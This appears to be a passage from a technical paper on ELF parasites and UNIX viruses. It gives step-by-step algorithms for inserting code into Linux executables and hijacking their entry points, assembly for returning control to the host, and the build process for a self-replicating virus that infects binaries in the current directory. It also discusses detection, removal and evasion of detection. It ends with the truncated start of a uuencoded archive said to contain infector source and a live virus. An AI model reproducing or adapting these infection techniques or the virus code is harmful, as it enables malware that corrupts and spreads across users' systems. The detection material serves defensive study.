Extending the text segment forward or extending the data segment backward will
probably overlap the segments. Relocating a segment in memory will cause
problems with any code that absolutely references memory.

It is possible to extend the data segment, however this isn't preferred,
as its not UNIX portable that properly implement execute memory protection.
An ELF parasite however is implemented using this technique and is explained
later in this article.

THE EXECUTABLE AND LINKAGE FORMAT

A more complete ELF executable layout is (ignoring section content - see
below).

ELF Header
Program header table
Segment 1
Segment 2
Section header table optional

In practice, this is what is normally seen.

ELF Header
Program header table
Segment 1
Segment 2
Section header table
Section 1
.
.
Section n

Typically, the extra sections (those not associated with a segment) are such
things as debugging information, symbol tables etc.

>From the ELF specifications:

"An ELF header resides at the beginning and holds a ``road map'' describing the
file's organization. Sections hold the bulk of object file information for the linking view: instructions, data, symbol table, relocation information, and so
on.

...
...

A program header table, if present, tells the system how to create a process
image. Files used to build a process image (execute a program) must have a
program header table; relocatable files do not need one. A section header
table contains information describing the file's sections. Every section has
an entry in the table; each entry gives information such as the section name,
the section size, etc. Files used during linking must have a section header
table; other object files may or may not have one.

...
...

Executable and shared object files statically represent programs. To execute
such programs, the system uses the files to create dynamic program
representations, or process images. A process image has segments that hold
its text, data, stack, and so on. The major sections in this part discuss the
following.

Program header. This section complements Part 1, describing object file
structures that relate directly to program execution. The primary data
structure, a program header table, locates segment images within the file and
contains other information necessary to create the memory image for the
program."


An ELF object may also specify an entry point of the program, that is, the
virtual memory location that assumes control of the program. Thus to
activate parasite code, the program flow must include the new parasite. This
can be done by patching the entry point in the ELF object to point (jump)
directly to the parasite. It is then the parasite's responsibility that the
host code be executed - typically, by transferring control back to the host
once the parasite has completed its execution.

>From /usr/include/elf.h

typedef struct
{
unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */
Elf32_Half e_type; /* Object file type */
Elf32_Half e_machine; /* Architecture */
Elf32_Word e_version; /* Object file version */
Elf32_Addr e_entry; /* Entry point virtual address */
Elf32_Off e_phoff; /* Program header table file offset */
Elf32_Off e_shoff; /* Section header table file offset */
Elf32_Word e_flags; /* Processor-specific flags */
Elf32_Half e_ehsize; /* ELF header size in bytes */
Elf32_Half e_phentsize; /* Program header table entry size */
Elf32_Half e_phnum; /* Program header table entry count */
Elf32_Half e_shentsize; /* Section header table entry size */
Elf32_Half e_shnum; /* Section header table entry count */
Elf32_Half e_shstrndx; /* Section header string table index */
} Elf32_Ehdr;

e_entry is the entry point of the program given as a virtual address. For
knowledge of the memory layout of the process image and the segments that
compromise it stored in the ELF object see the Program Header information
below.

e_phoff gives use the file offset for the start of the program header table.
Thus to read the header table (and the associated loadable segments), you may
lseek to that position and read e_phnum*sizeof(Elf32_Pdr) bytes associated with
the program header table.

It can also be seen, that the section header table file offset is also given.
It was previously mentioned that the section table resides at the end of
the file, so after inserting of data at the end of the segment on file, the
offset must be updated to reflect the new position.

/* Program segment header. */

typedef struct
{
Elf32_Word p_type; /* Segment type */
Elf32_Off p_offset; /* Segment file offset */
Elf32_Addr p_vaddr; /* Segment virtual address */
Elf32_Addr p_paddr; /* Segment physical address */
Elf32_Word p_filesz; /* Segment size in file */
Elf32_Word p_memsz; /* Segment size in memory */
Elf32_Word p_flags; /* Segment flags */
Elf32_Word p_align; /* Segment alignment */
} Elf32_Phdr;

Loadable program segments (text/data) are identified in a program header by a
p_type of PT_LOAD (1). Again as with the e_shoff in the ELF header, the
file offset (p_offset) must be updated in later phdr's to reflect their new
position in the file.

p_vaddr identifies the virtual address of the start of the segment. As
mentioned above regarding the entry point. It is now possible to identify
where program flow begins, by using p_vaddr as the base index and calculating
the offset to e_entry.

p_filesz and p_memsz are the file sizes and memory sizes respectively that
the segment occupies. The use of this scheme of using file and memory sizes,
is that where its not necessary to load memory in the process from disk, you
may still be able to say that you want the process image to occupy its
memory.

The .bss section (see below for section definitions), which is for
uninitialized data in the data segment is one such case. It is not desirable
that uninitialized data be stored in the file, but the process image must
allocated enough memory. The .bss section resides at the end of the segment
and any memory size past the end of the file size is assumed to be part of
this section.

/* Section header. */

typedef struct
{
Elf32_Word sh_name; /* Section name (string tbl index) */
Elf32_Word sh_type; /* Section type */
Elf32_Word sh_flags; /* Section flags */
Elf32_Addr sh_addr; /* Section virtual addr at execution */
Elf32_Off sh_offset; /* Section file offset */
Elf32_Word sh_size; /* Section size in bytes */
Elf32_Word sh_link; /* Link to another section */
Elf32_Word sh_info; /* Additional section information */
Elf32_Word sh_addralign; /* Section alignment */
Elf32_Word sh_entsize; /* Entry size if section holds table */
} Elf32_Shdr;

The sh_offset is the file offset that points to the actual section. The
shdr should correlate to the segment its located it. It is highly suspicious
if the vaddr of the section is different to what is in from the segments
view.

THE TEXT SEGMENT PADDING VIRUS (PADDING INFECTION)

The resulting segments after parasite insertion into text segment padding looks
like this.

key:
[...] A complete page
V Parasite code
T Text
D Data
P Padding

Page Nr
#1 [TTTTTTTTTTTTVVPP] <- Text segment
#2 [PPPPDDDDDDDDPPPP] <- Data segment

...

After insertion of parasite code, the layout of the ELF file will look like
this.

ELF Header
Program header table
Segment 1 - The text segment of the host
- The parasite
Segment 2
Section header table
Section 1
.
.
Section n

Thus the parasite code must be physically inserted into the file, and the
text segment extended to see the new code.


To insert code at the end of the text segment thus leaves us with the following
to do so far.

* Increase p_shoff to account for the new code in the ELF header
* Locate the text segment program header
* Increase p_filesz to account for the new code
* Increase p_memsz to account for the new code
* For each phdr who's segment is after the insertion (text segment)
* increase p_offset to reflect the new position after insertion
* For each shdr who's section resides after the insertion
* Increase sh_offset to account for the new code
* Physically insert the new code into the file - text segment p_offset
+ p_filesz (original)

There is one hitch however. Following the ELF specifications, p_vaddr and
p_offset in the Phdr must be congruent together, to modulo the page size.

key: ~= is denoting congruency.

p_vaddr (mod PAGE_SIZE) ~= p_offset (mod PAGE_SIZE)

This means, that any insertion of data at the end of the text segment on the
file must be congruent modulo the page size. This does not mean, the text
segment must be increased by such a number, only that the physical file be
increased so.

This also has an interesting side effect in that often a complete page must be
used as padding because the required vaddr isn't available. The following
may thus happen.

key:
[...] A complete page
T Text
D Data
P Padding

Page Nr
#1 [TTTTTTTTTTTTPPPP] <- Text segment
#2 [PPPPPPPPPPPPPPPP] <- Padding
#3 [PPPPDDDDDDDDPPPP] <- Data segment

This can be taken advantage off in that it gives the parasite code more space,
such a spare page cannot be guaranteed.

To take into account of the congruency of p_vaddr and p_offset, our algorithm
is modified to appear as this.

* Increase p_shoff by PAGE_SIZE in the ELF header
* Locate the text segment program header
* Increase p_filesz by account for the new code
* Increase p_memsz to account for the new code
* For each phdr who's segment is after the insertion (text segment)
* increase p_offset by PAGE_SIZE
* For each shdr who's section resides after the insertion
* Increase sh_offset by PAGE_SIZE
* Physically insert the new code and pad to PAGE_SIZE, into the file -
text segment p_offset + p_filesz (original)

Now that the process image loads the new code into being, to run the new code
before the host code is a simple matter of patching the ELF entry point and
the virus jump to host code point.

The new entry point is determined by the text segment v_addr + p_filesz
(original) since all that is being done, is the new code is directly prepending
the original host segment. For complete infection code then.

* Increase p_shoff by PAGE_SIZE in the ELF header
* Patch the insertion code (parasite) to jump to the entry point
(original)
* Locate the text segment program header
* Modify the entry point of the ELF header to point to the new
code (p_vaddr + p_filesz)
* Increase p_filesz by account for the new code (parasite)
* Increase p_memsz to account for the new code (parasite)
* For each phdr who's segment is after the insertion (text segment)
* increase p_offset by PAGE_SIZE
* For each shdr who's section resides after the insertion
* Increase sh_offset by PAGE_SIZE
* Physically insert the new code (parasite) and pad to PAGE_SIZE, into
the file - text segment p_offset + p_filesz (original)

This, while perfectly functional, can arouse suspicion because the the new
code at the end of the text segment isn't accounted for by any sections.
Its an easy matter to associate the entry point with a section however by
extending its size, but the last section in the text segment is going to look
suspicious. Associating the new code to a section must be done however as
programs such as 'strip' use the section header tables and not the program
headers. The final algorithm is using this information is.

* Increase p_shoff by PAGE_SIZE in the ELF header
* Patch the insertion code (parasite) to jump to the entry point
(original)
* Locate the text segment program header
* Modify the entry point of the ELF header to point to the new
code (p_vaddr + p_filesz)
* Increase p_filesz by account for the new code (parasite)
* Increase p_memsz to account for the new code (parasite)
* For each phdr who's segment is after the insertion (text segment)
* increase p_offset by PAGE_SIZE
* For the last shdr in the text segment
* increase sh_len by the parasite length
* For each shdr who's section resides after the insertion
* Increase sh_offset by PAGE_SIZE
* Physically insert the new code (parasite) and pad to PAGE_SIZE, into
the file - text segment p_offset + p_filesz (original)

infect-elf-p is the supplied program (complete with source) that implements
the elf infection using text segment padding as described.

INFECTING INFECTIONS

In the parasite described, infecting infections isn't a problem at all. By
skipping executables that don't have enough padding for the parasite, this
is solved implicitly. Multiple parasites may exist in the host, but their is
a limit of how many depending on the size of the parasite code.

THE DATA SEGMENT VIRUS (DATA INFECTION)

The new method of ELF infection as briefly described in the last section means
that the data segment is extended and the parasite is located in the new
extended space. In x86 architecture, at least, code that is in the data
segment may be executed.

To extend the data segment means we simply have to extend the program header
in the ELF executable. Note must be taken though, that the .bss section
ends the data segment normally. This section is used for uninitialized data
and occupies no file space but does occupy memory space. If we extend
the data segment we have to leave space for the .bss section. The memory
layout is as follows.

original:

[text]
[data]

parasite:

[text]
[data]
[parasite]

The algorithm for the data segment parasite is show below.

* Patch the insertion code (parasite) to jump to the entry point
(original)
* Locate the data segment
* Modify the entry point of the ELF header to point to the new
code (p_vaddr + p_memsz)
* Increase p_filesz to account for the new code and .bss
* Increase p_memsz to account for the new code
* Find the length of the .bss section (p_memsz - p_filesz)
* For each phdr who's segment is after the insertion (text segment)
* increase p_offset to reflect the new position after insertion
* For each shdr who's section resides after the insertion
* Increase sh_offset to account for the new code
* Physically insert the new code into the file

The algorithm shown works for an ELF executable but the parasite inserted into
the host becomes strip unsafe because no section matches the parasite. A
new section could be created for this purpose to become strip safe again.
This however has not been implemented.

This type of virus is easy to spot if you know what your looking for. For
starters no section matches the entry point and more suspect is the fact that
the entry point is in the data segment.

VIRUS DETECTION

The detection of the data segment virus is extremely easy taking into account
that the entry point of the ELF image is in the data segment not in the text
segment.

An implementation of a simple virus scanner is supplied.

THE TEXT SEGMENT VIRUS (TEXT INFECTION)

The text segment virus works under the premise that the text segment can be
extended backwards and new parasite code can run in the extension. The memory
layout is as follows.

original:

[text]
[data]


parasite:

[parasite] (new start of text)
[text]
[data]

The algorithm is as follows:

* Patch the insertion code (parasite) to jump to the entry point
(original)
* Locate the text segment

* For each phdr who's segment is after the insertion (text segment)
* increase p_offset to reflect the new position after insertion
* For each shdr who's section resides after the insertion
* Increase sh_offset to account for the new code
* Physically insert the new code into the file


INFECTION USING OBJECT CODE PARASITES

It is often desireable not to use assembler for parasite code but use direct
C code instead. This can make writing a pure C virus possible avoiding the
messy steps of converting code to asm which require extra time and skill.

This can be acheived through the use of relocatable or object code. Because
we can't just extract an executeable image as the parasite image because the
image is fixed at a certain memory location we can use a relocatable image and
link into the desired location.

OBJECT CODE LINKING

ELF is the typical standard used to represent object code on Linux. The paper
will thus only refer to linking using ELF objects.

An object code file is referred to as relocatable code when using ELF because
that summarizes what it is. It is not fixed to any memory position. It is
the responsibility of linking that makes an executable image out of a
relocatable object and binds symbols to addresses.

Linking of code is done by relocating the code to a fixed positing. For the
most part, the object code does not need to be changed heavily.

Consider the following C code.

#include <linux/unistd.h>
#include <linux/types.h>

static inline _syscall3(ssize_t, write, int, fd, const void *, buf, size_t, count);

int main()
{
write(1, "INFECTED Host\n", 14);
}

The string 's' being part of the relocatable text section in the object
has no known absolute position in memory at compile time. Likewise, printk,
is an externally defined symbol and its address is also not known at compile
time.

Relocation sections in the ELF object are used for describing what needs to be
modified (relocated) in the object. In the above case, relocation entries
would be made for printk's reference and the string's reference.

The format for an ELF relocatable object (object code) is as follows.

ELF header
Program header table
Section 1
Section n
Section header table

>From the ELF specifications.


"String Table

String table sections hold null-terminated character sequences, commonly called
strings. The object file uses these strings to represent symbol and section
names. One references a string as an index into the string table section. The
first byte, which is index zero, is defined to hold a null character.
Likewise, a string tables last byte is defined to hold a null character,
ensuring null termination for all strings. A string whose index is zero
specifies either no name or a null name, depending on the context. An empty
string table section is permitted; its section headers sh_size member would
contain zero. Non-zero indexes are invalid for an empty string table."


.
.
.

Symbol Table

An object file's symbol table holds information needed to locate and relocate a
program's symbolic definitions and references. A symbol table index is a
subscript into this array. Index 0 both designates the first entry in the
table and serves as the undefined symbol index. The contents of the initial
entry are specified later in this section."

/* Symbol table entry. */

typedef struct
{
Elf32_Word st_name; /* Symbol name (string tbl index) */
Elf32_Addr st_value; /* Symbol value */
Elf32_Word st_size; /* Symbol size */
unsigned char st_info; /* Symbol type and binding */
unsigned char st_other; /* No defined meaning, 0 */
Elf32_Section st_shndx; /* Section index */
} Elf32_Sym;

#define SHN_UNDEF 0 /* No section, undefined symbol. */

/* How to extract and insert information held in the st_info field. */

#define ELF32_ST_TYPE(val) ((val) & 0xf)
#define ELF32_ST_INFO(bind, type) (((bind) << 4) + ((type) & 0xf))

/* Legal values for ST_BIND subfield of st_info (symbol binding). */

#define STB_LOCAL 0 /* Local symbol */
#define STB_GLOBAL 1 /* Global symbol */
#define STB_WEAK 2 /* Weak symbol */
#define STB_NUM 3 /* Number of defined types. */
#define STB_LOPROC 13 /* Start of processor-specific */
#define STB_HIPROC 15 /* End of processor-specific */

>From the ELF specifications.

"
A relocation section references two other sections: a symbol table and a
section to modify. The section headers sh_info and sh_link members, described
in ``Sections'' above, specify these relationships. Relocation entries for
different object files have slightly different interpretations for the r_offset
member.

In relocatable files, r_offset holds a section offset. That is, the relocation
section itself describes how to modify another section in the file; relocation
offsets designate a storage unit within the second section."

>From /usr/include/elf.h

/* Relocation table entry without addend (in section of type SHT_REL). */

typedef struct
{
Elf32_Addr r_offset; /* Address */
Elf32_Word r_info; /* Relocation type and symbol index */
} Elf32_Rel;

/* How to extract and insert information held in the r_info field. */

#define ELF32_R_SYM(val) ((val) >> 8)
#define ELF32_R_TYPE(val) ((val) & 0xff)
#define ELF32_R_INFO(sym, type) (((sym) << 8) + ((type) & 0xff))

These selected paragraphs and sections from the ELF specifications and header
files give us a good high level concept of how a relocatable ELF file can
be linked to produce an image capable of being executed.

The process of linking the image is as follows.

* Identify the file as being in relocatable ELF format
* Load each relevant section into memory
* For each PROGBITS section set the section address in memory
* For each REL (relocation) section, carry out the relocation
* Assemble the executable image by copying the sections into their
respective positions in memory

The relocation step may be expanded into the following algorithm.

* Evaluate the target section of the relocation entry
* Evaluate the symbol table section of the relocation entry
* Evaluate the location in the section that the relocation is to apply
* Evaluate the address of the symbol that is used in the relocation
* Apply the relocation

The actual relocation is best presented by looking at the source. For more
information on the relocation types refer to the ELF specifications. Note
that we ignore the global offset table completely and any relocation types
of its nature.

switch (ELF32_R_TYPE(rel->r_info)) {
case R_386_NONE:
break;

case R_386_PLT32:
case R_386_

  
PC32:
*loc -= dot; /* *loc += addr - dot */

case R_386_32:
*loc += addr;
break;

THE IMPLEMENTED INFECTOR

The implemented infector must use C parasite code that avoids libc and uses
Linux syscalls exclusively. This means that plt/got problems are avoided.
Likewise the parasite code must end in the following asm:

loop1:
popl %eax
cmpl $0x22223333, %eax
jne loop1

popl %edx
popl %ecx
popl %ebx
popl %eax
popl %esi
popl %edi
movl $0x11112222, %ebp
jmp *%ebp

This is so it can jump back to the host correctly. It uses a little trickery
to do this properly. Why the popl loop? - well.. the jump back to host goes in
_before_ the end of main, so there are still some variables to be pop'd back
before your back to where you start. you don't know how many variables have
been pushed, so a unique magic number is used to mark the start/end of it -
check the initcode in relocater.c. The movl $0x11112222,%ebp ? - well.. u don't
know where abouts this jmp (back to host) is going to be in the code, so you
substitute a unique magic number where you want the host entry point to go.
Then you search the object code for the magic and replace.

NON (NOT AS) TRIVIAL PARASITE CODE

Parasite code that requires memory access requires the stack to be used
manually naturally. No bss section can be used from within the virus code in
the padding and text infectors because it can only use part of the text
segment. It is strongly suggested that rodata not be used, in-fact, it is
strongly suggested that no location specific data be used at all that resides
outside the parasite at infection time.

Thus, if initialized data is to be used, it is best to place it in the text
segment, ie at the end of the parasite code - see below on calculating address
locations of initialized data that is not known at compile/infection time.

If the heap is to be used, then it will be operating system dependent. In
Linux, this is done via the 'brk' syscall.

The use of any shared library calls from within the parasite should be removed,
to avoid any linking problems and to maintain a portable parasite in files
that use varying libraries. It is thus naturally recommended to avoid using
libc.

Most importantly, the parasite code must be relocatable. It is possible to
patch the parasite code before inserting it, however the cleanest approach
is to write code that doesn't need to be patched.

In x86 Linux, some syscalls require the use of an absolute address pointing to
initialized data. This can be made relocatable by using a common trick used
in buffer overflow code.

jmp A
B:
pop %eax ; %eax now has the address of the string
. ; continue as usual
.
.

A:
call B
.string \"hello\"

By making a call directly proceeding the string of interest, the address of
the string is pushed onto the stack as the return address.

BEYOND ELF PARASITES AND ENTER VIRUS IN UNIX

In a UNIX environment the most probably method for a typical garden variety
virus to spread is through infecting files that it has legal permission to do
so.

A simple method of locating new files possible to infect, is by scanning the
current directory for writable files. This has the advantage of being
relatively fast (in comparison to large tree walks) but finds only a small
percentage of infect-able files.

Directory searches are however very slow irrespectively, even without large
tree walks. If parasite code does not fork, its very quickly noticed what is
happening. In the sample virus supplied, only a small random set of files
in the current directory are searched.

Forking, as mentioned, easily solves the problem of slowing the startup to
the host code, however new processes on the system can be spotted as abnormal
if careful observation is used.

The parasite code as mentioned, must be completely written in machine code,
this does not however mean that development must be done like this.
Development can easily be done in a high level language such as C and then
compiled to asm to be used as parasite code.

A bootstrap process can be used for initial infection of the virus into a host
program that can then be distributed. That is, the ELF infector code is used,
with the virus as the parasite code to be inserted.

THE LINUX PARASITE VIRUS

This virus implements the ELF infection described by utilizing the padding at
the end of the text segment. In this padding, the virus in its entirety is
copied, and the appropriate entry points patched.

At the end of the parasite code, are the instructions.

movl %ebp, $XXXX
jmp *%ebp

XXXX is patched when the virus replicates to the host entry point. This
approach does have the side effect of trashing the ebp register which may or
may not be destructive to programs who's entry points depend on ebp being set
on entry. In practice, I have not seen this happen (the implemented Linux
virus uses the ebp approach), but extensive replicating has not been performed.

On execution of an infected host, the virus will copy the parasite (virus)
code contained in itself (the file) into memory.

The virus will then scan randomly (random enough for this instance) through
the current directory, looking for ELF files of type ET_EXEC or ET_DYN to
infect. It will infect up to Y_INFECT files, and scan up to N_INFECT files in
total.

If a file can be infected, ie, its of the correct ELF type, and the padding
can sustain the virus, a a modified copy of the file incorporating the virus
is made. It then renames the copy to the file its infecting, and thus it
is infected.

Due to the rather large size of the virus in comparison to the page size
(approx 2.3k) not all files are able to be infected, in fact only near half on
average.

DEVELOPMENT OF THE LINUX VIRUS

The Linux virus was completely written in C, and strongly based around the
ELF infector code. The C code is supplied as elf-p-virus.c The code requires
the use of no libraries, and avoids libc by using a similar scheme to the
_syscall declarations Linux employs modified not to use errno.

Heap memory was used for dynamic allocation of the phdr and shdr tables using
'brk'.

Linux has some syscalls which require the address of initialized strings to
be passed to it, notably, open, rename, and unlink. This requires initialized
data storage. As stated before, rodata cannot be used, so this data was
placed at the end of the code. Making it relocatable required the use of the
above mentioned algorithm of using call to push the address (return value)
onto the stack. To assist in the asm conversion, extra variables were
declared so to leave room on the stack to store the addresses as in some
cases the address was used more than once.

The C code form of the virus allowed for a debugging version which produces
verbose output, and allows argv[0] to be given as argv[1]. This is
advantageous because you can setup a pseudo infected host which is non
replicating. Then run the virus making argv[0] the name of the pseudo infected
host. It would replicate the parasite from that host. Thus it was possible to
test without having a binary version of a replicating virus.

The C code was converted to asm using the c compiler gcc, with the -S flag to
produce assembler. Modifications were made so that use of rodata for
initialized data (strings for open, unlink, and rename), was replaced with
the relocatable data using the call address methodology.

Most of the registers were saved on virus startup and restored on exit
(transference of control to host).

The asm version of the virus, can be improved tremendously in regards to
efficiency, which will in turn improve the expected life time and replication
of the virus (a smaller virus can infect more objects, where previously the
padding would dictate the larger virus couldn't infect it). The asm virus was
written with development time the primary concern and hence almost zero time
was spent on hand optimization of the code gcc generated from the C version.
In actual fact, less than 5 minutes were spent in asm editing - this is
indicative that extensive asm specific skills are not required for a non
optmised virus.

The edited asm code was compiled (elf-p-virus-egg.c), and then using objdump
with the -D flag, the addresses of the parasite start, the required offsets for
patching were recorded. The asm was then edited again using the new
information. The executable produced was then patched manually for any bytes
needed. elf-text2egg was used to extract hex-codes for the complete length of
the parasite code usable in a C program, ala the ELF infector code. The ELF
infector was then recompiled using the virus parasite.

# objdump -D elf-p-virus-egg
.
.
08048143 <time>:
8048143: 55 pushl %ebp
.
.
08048793 <main0>:
8048793: 55 pushl %ebp
.
.
80487f8: 6a 00 pushl $0x0
80487fa: 68 7e 00 00 00 pushl $0x7e
80487ff: 56 pushl %esi
8048800: e8 2e fa ff ff call 8048233 <lseek>
.
.
80489ef: bd 00 00 00 00 movl $0x0,%ebp
80489f4: ff e5 jmp *%ebp

080489f6 <dot_jump>:
80489f6: e8 50 fe ff ff call 804884b <dot_call>
80489fb: 2e 00 e8 addb %ch,%al

080489fd <tmp_jump>:
80489fd: e8 52 f9 ff ff call 8048354 <tmp_call>
8048a02: 2e 76 69 jbe 8048a6e <init+0x4e>
8048a05: 33 32 xorl (%edx),%esi
8048a07: 34 2e xorb $0x2e,%al
8048a09: 74 6d je 8048a78 <init+0x58>
8048a0b: 70 00 jo 8048a0d <tmp_jump+0x10>

0x8048143 specifies the start of the parasite (time).
0x8048793 is the entry point (main0).
0x80487fb is the lseek offset which is the offset in argv[0] to the parasite.
0x80489f0 is the host entry point.
0x8048a0d is the end of the parasite (not inclusive).

0x8048a0d - 0x8048143 (2250)is the parasite length.
0x8048793 - 0x8048143 (1616) is the entry point as a parasite offset.
0x80487fb - 0x8048143 (1720) is the seek offset as a parasite offset.
0x80489f0 - 0x8048143 (2221) is the host entry point as a parasite offset.

# objdump --all-headers elf-p-virus-egg
.
.
Program Header:
LOAD off 0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
filesz 0x00015960 memsz 0x00015960 flags r-x
.
.

The seek offset as a file offset is 0x80487fb - 0x08048000 + 0x00000000 (2043)
(<seek address from above> - <vaddr> + <off>)

To patch the initial seek offset, an infection must be manually performed,
and the offset recorded. The infected host is not functional in this form.

# infect-elf-p host
Parasite length: 2251, Host entry point index: 2221, Entry point offset: 1616
Host entry point: 0x8048074
Padding length: 3970
New entry point: 0x80486ce
Parasite file offset: 126
Infection Done
# vpatch elf-p-virus-egg 2043 126

The supplied program elf-egg2text will convert the address range specified
on the command line, and found using the ELF loadable segments in the file to
a hex string for use in C.

usage: elf-egg2text filename start stop

# elf-egg2text elf-p-virus-egg 0x08048143 0x8048a0d > parasite-v.c

parasite-v.c was edited manually to declare the hex string as the variabled
char parasite[], and likewise these variables were declared.

long hentry = 2221;
long entry = 1616;
int plength = 2250;

The infector was recompiled and thus can infect the host it was compiled for
making it a live virus. null-carrier is the supplied host program that the
infector is compiled for.

This completed the manual infection of the virus to a host. The newly infected
host would then attempt replication on execution. A live virus has been
included in the source package (live-virus-be-warned). A simplified carrier
program (carrier.S) was used to host the virus (null-carrier is the uninfected
host as stated).

IMPROVING THE LINUX VIRUS

The first major change that would increase the life time and replication rates
of the virus is to optimise the code to be space efficient. Looking at a 50%
size decrease is probably realistic when optimised.

The replication is notable rather slow scanning only the current directory.
The virus may be modified to do small tree walks increasing infection rates
dramatically.

The virus is easily detected - see below.

VIRUS DETECTION

The virus described is relatively easy to detect. The blatant oddity is that
the entry point of the program isn't in a normal section or not in a section at
all.

Typically the last section in the text segment is .rodata which obviously
shouldn't be the entry point. Likewise, it is suspicious if a program does
not have a corresponding section then this arouses any would be virus scanner.
Also if no section table at all, which will disguise what section the entry
point is in, is certainly an odd event (even though this is optional).

Removal of the virus described here, is similar to infection, requiring
deletion of the virus code, modification of the ELF headers to reflect segment
relocation in the file and patching of the entry point to jump to the proper
code.

Location of the correct entry point can be easily seen by disassembling the
executable using objdump, matching the entry point of the infected file to
the disassembled code, and tracing through the code to find where the parasite
code returns flow back to the host.

$ objdump --all-headers host # a parasite infected host

>host: file format elf32-i386
>host
>architecture: i386, flags 0x00000112:
>EXEC_P, HAS_SYMS, D_PAGED
>start address 0x08048522

.
.

The entry point is thus seen as 0x08048522, the entry point of the suspected
parasite code.

$ disassemble --disassemble-all host

>host: file format elf32-i386
>
>Disassembly of section .interp:
>
>080480d4 <.interp>:
> 80480d4: 2f das
> 80480d5: 6c insb (%dx),%es:(%edi)

.
.

>Disassembly of section .text:
>
>08048400 <_start>:
> 8048400: 31 ed xorl %ebp,%ebp
> 8048402: 85 d2 testl %edx,%edx
> 8048404: 74 07 je 804840d <_start+0xd>

.
.

>Disassembly of section .rodata:
>
>0804851c <.rodata>:
> 804851c: 48 decl %eax
> 804851d: 6f outsl %ds:(%esi),(%dx)
> 804851e: 73 74 jae 8048594 <_fini+0x94>
> 8048520: 0a 00 orb (%eax),%al
> 8048522: b8 00 84 04 08 movl $0x8048400,%eax
> 8048527: ff e0 jmp *%eax
> ...
>Disassembly of section .data:

.
.

Looking at the entry point code, which looks obviously to be parasite code
since its residing in the .rodata section, we have.

movl $0x8048400,%eax
jmp *%eax

This code is easily seen to be jumping to _start, the original host code.

# entry host 0x808400

The parasite code is thus easily removed from program flow by patching the
entry point to skip the parasite code.

On occasion no section matches the parasite code and hence the entry point.
objdump will only disassemble sections so thus we can't see the parasite code as
is. However, gdb can be used to disassemble manually, and the same method of
manually finding the host entry point can be used as above.

Automated virus detection of these variety of UNIX virus is practical by
detecting missing section headers and/or entry points to non permissible
sections or segments.

Typically, the default entry point is _start, however this can be changed in
linking. If a virus has been found in a file, and the host entry point is
indeterminable for any reason, it may be beneficial to patch the entry point
to _start. This however is still guesswork and not totally reliable.

Typical general virus detection algorithms are directly applicable in UNIX,
including signature strings, code flagging, file integrity checking etc.

EVADING VIRUS DETECTION IN ELF INFECTION

The major problem in terms of evading detection with the parasite described,
is that the entry point changes to a suspicious position.

Ideally, the entry point of the program either wouldn't change or stay within
expected sections.

A possible method using the parasite described would be to find unused memory
in normal entry point sections such as the .text section, and insert code to
jump to the parasite code. This would require only a small number of bytes,
and such empty space is common, as can be noted by looking through disassembly
of executables.

Alternatively, one of the original ideas of where to insert the parasite code,
thrown away, by extending the text segment backwards may be possible. The
parasite code and entry point would belong in the .text section and thus
seemingly be quite normal.

CONCLUSION

The algorithms and implementation presented gives a clear example and proof of
concept that UNIX while not popular for, is actually a viable breeding ground
for parasites and virus.

-- cut
begin 644 unix-viruses-src.tgz
M'XL(`"A__S<``^U]:XR<UW78ZF&%,U!+I?&/-`F"3RN+GB%G5_/>F5U1"46N
M9")\:9>B+'.9Z3R^V1UR=F8R,[M<6F(L@V(;8LVZ*&K`+1JT0)$B19M?A6"W
M@0(_TBHH7"=%$\"MT]8%G(*I#=0M@E:.%;/GG/N^W_WFL9Q=*?9\TG)F[N/<
M<\\]Y]QSS[W?N5NMQL[<=J.[U?-[<[UN]9F9R3]>-KF0RWDS'CY)ZY/_\/(+
M"POPETWG/2^5SF33,UYN'W`)/%N]?KGK>3/==KL_J-RP_+^DSY8]_F?+U_QZ
MH^E/L(U4,IG/9D/'/YW,IL3XY_+I+(P_,`R,?W*".(0^/^;C?_*D=]Q;KU:C
M)U\X<^+%5?@Q=S[MS=7;FXW^7+U;WO3G.NU&J^]WO;EU[REO[I5RLQD]>6;Y
MQ+D73I]9A@J11JON5_MS?K,^U_'H7\90<S6_LK7N;7?*_>J&D>&OKWMKT4A$
M3VNU67%,\UO][@WZUO=W^FDLKA6=[U'EUE:S.5<M=[L-OQN-`E:+H9CH.#A@
M2R!ZZF)$_S5?C48^$CMY,N[!OT2IN&?F>W-M[R._R&!0&PP`?0VKS3-%58;E
M8H1]NBJ)'%%#[_!BI%/NEGN-O@_Y>H8+4&A1O1N<>HOZ.+F`S9TZM?S\RR\:
M8T2``LP@ZA(7,4X#\>LWJLA<`ZMS]A@`8-4$$(T^%:EV++ZQF!!+64E&9^>,
MD:?66+OKLME`:4%`SE2+$?YE?E7":;5[_5JS4?%D%E8R^9F0UY.\9F/;YPU5
M_+GKY6[+KT&Q^6<,K@\I5=W8;-=`YSJSH]6F7VXM1B/=39!\'%@IWO'H^ZV@
MIL^^/H'YO^LWV]4RZ/OYZJ3:&#S_IQ?RJ07+_LOFT\GI_'\0SU.-5K6Y5?.]
M9T$G-=KS&\]%C2104V8:,`PD6^5N])Y!?1A,[=_H^#T;:+?16C?3ZM56OVDF
M@3HS$];]?KM#342?JH&)VO*]LR=>/'VRM'SNXLJKD>1."IXT/-$HU\U@MGA^
MM]ON@E637-)3NULMEE;=@,%OM!K]*LPOEZ]`8C0RN[:36YB-1"+/'(UTMGH;
M3<][VJ\U(I&CS[#,O)W9TS*3=F9Y1V5F[,R*EIFR,ZM:9CJ`D,K,%]9V,AGV
MET[CWZQ6]"/)':1*!AY1H5);VTDF];]9SX,:F^WM)I9/)A"UCFR@7E_;\7.S
MGO$\<]2+;':\H[+D$A*^NU7M>R68;+::OO=:-++<K&?2I>6-6C?BPS]+(F45
M?AR-]%C25JO76(>9R&NV6^N1S7*-4F&@(I&FWQ)?`7B_7&G4=B`!Q^WH44B#
MF:_1AB(WH74.^<:F=Q1U6+/4N[%9`D:IQ62KF`>I`"=!C-!*>,0"1QEP^-5N
M]?H\K076;S0>?8W:]QK00J0.S!1K$.]X#>]9KP4?QX[%L:>11MV+/0EPJIN=
MV!$&[S)KZW+CRGRO7T)X5Q(>?L3C4"'2]?M;W99W1):"GMV$5GCZN9?/G(&>
M!3L&-HCJFT7SH^PSV!/JB-Y9Z`4K._<<)^-E^5N0^LK2@,Z+TCBP\WZIM]':
MVM3HH08:6L1_CWM'9`/PF_K+Z8:_,;6$"L,[?MQ;_=C%TNJK9R^>>)X!LP:0
M*D;@"P`-C#4\,:UXW.YEXTJ""LE&>XU/^L_@/^VZJACGA1ACT'=B"/B,+^&_
